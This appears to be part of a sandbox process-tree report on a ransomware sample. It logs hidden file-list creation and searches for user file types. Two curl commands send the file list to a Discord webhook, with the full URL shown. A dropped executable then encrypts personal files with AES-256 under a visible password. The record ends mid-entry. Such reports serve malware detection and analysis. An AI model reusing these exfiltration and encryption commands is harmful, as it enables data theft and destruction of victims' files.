attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1912

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6120

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5920

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5704

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5736

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.docx
4⤵
PID:952

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4376

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6116

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6136

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4524

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1840

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.zip
4⤵
PID:3688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5684

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3756

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.jpeg
4⤵
PID:5368

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.bak
4⤵
PID:1292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.lnk
4⤵
PID:1928

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1912

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6120

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5920

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3584

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1248

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1676

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5932

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:952

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:812

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:896

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4332

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:212

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5676

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1164

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2924

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3812

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1896

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2240

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6040

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5456

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3916

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5216

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4372

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1292

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2492

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1596

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6100

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5568

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3164

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5932

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:952

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5000

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5732

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:896

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3064

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5588

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4528

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4440

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3664

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5312

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3292

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1648

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5368

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5940

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2076

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.tmp
4⤵
PID:4372

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1292

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2492

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3180

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2960

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2496

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5388

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6100

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:448

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3164

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6080

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:812

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3288

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5324

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5304

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3116

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5336

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5852

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6140

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:468

C:\Windows\system32\attrib.exe
Attrib +h +s C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt
4⤵
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "files:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2240

C:\Windows\system32\findstr.exe
findstr /b "files:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3252

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Files to be encrypted // from Admin - 10.127.0.105 @ 12:32:40.48 ```\"}" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:2308

C:\Windows\system32\curl.exe
curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt" https://discord.com/api/webhooks/1213007591198818315/uhbDkZUnvFr29Pwrn7ORn2PpRG8pUODi2xcD0mFtZDN3DfT4l5MMsAE9RZptiaKeGosY
4⤵
PID:6052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "1:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5580

C:\Windows\system32\findstr.exe
findstr /b "1:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:2060

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Roaming\StepGrant.jpg"
4⤵
PID:5968

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Roaming\StepGrant.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:868

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Roaming\StepGrant.jpg"
4⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "2:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:740

C:\Windows\system32\findstr.exe
findstr /b "2:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5392

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
4⤵
PID:5920

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5704

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"
4⤵
PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "3:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:6116

C:\Windows\system32\findstr.exe
findstr /b "3:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3288

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Desktop\download.jpg"
4⤵
- Views/modifies file attributes
PID:4524

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Desktop\download.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:212

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Desktop\download.jpg"
4⤵
- Views/modifies file attributes
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "4:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5588

C:\Windows\system32\findstr.exe
findstr /b "4:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:6140

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Desktop\OIP.jpg"
4⤵
PID:1896

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Desktop\OIP.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4316

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Desktop\OIP.jpg"
4⤵
PID:3252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "5:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2432

C:\Windows\system32\findstr.exe
findstr /b "5:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4424

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Desktop\SubmitConnect.jpg"
4⤵
- Views/modifies file attributes
PID:1176

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Desktop\SubmitConnect.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3292

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Desktop\SubmitConnect.jpg"
4⤵
PID:2028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "6:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:3412

C:\Windows\system32\findstr.exe
findstr /b "6:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:1928

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Music\JoinSend.jpg"
4⤵
PID:5392

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Music\JoinSend.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3692

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Music\JoinSend.jpg"
4⤵
PID:3164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "7:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:6104

C:\Windows\system32\findstr.exe
findstr /b "7:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:6136

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Pictures\My Wallpaper.jpg"
4⤵
PID:6116

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Pictures\My Wallpaper.jpg" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4100

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Pictures\My Wallpaper.jpg"
4⤵
PID:5588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "8:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5856

C:\Windows\system32\findstr.exe
findstr /b "8:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:1660

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Desktop\WatchMeasure.mp3"
4⤵
PID:4976

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Desktop\WatchMeasure.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5020

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Desktop\WatchMeasure.mp3"
4⤵
PID:5580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "9:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:4868

C:\Windows\system32\findstr.exe
findstr /b "9:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4228

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Downloads\AssertOpen.mp3"
4⤵
PID:1652

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Downloads\AssertOpen.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1892

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Downloads\AssertOpen.mp3"
4⤵
PID:5576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "10:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:6100

C:\Windows\system32\findstr.exe
findstr /b "10:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3508

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Downloads\PublishStart.mp3"
4⤵
PID:5248

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Downloads\PublishStart.mp3" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6136

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Downloads\PublishStart.mp3"
4⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "11:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:4580

C:\Windows\system32\findstr.exe
findstr /b "11:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:4520

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\Music\PushConvertTo.mp4"
4⤵
PID:468

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\Music\PushConvertTo.mp4" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5000

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\Music\PushConvertTo.mp4"
4⤵
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "12:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:5312

C:\Windows\system32\findstr.exe
findstr /b "12:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:5856

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif"
4⤵
PID:4976

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1168

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif"
4⤵
PID:3392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b "13:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
4⤵
PID:2960

C:\Windows\system32\findstr.exe
findstr /b "13:" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\files.txt"
5⤵
PID:3544

C:\Windows\system32\attrib.exe
Attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif"
4⤵
PID:6052

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe
System.exe --encrypt --file="C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif" --pass=7962089087181755926211401126974224811160328267 --algo=AES-256
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3916

C:\Windows\system32\attrib.exe
Attrib -h -s "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.gif"
4⤵
PID:5968

C:\Windows\system32\cmd.exe
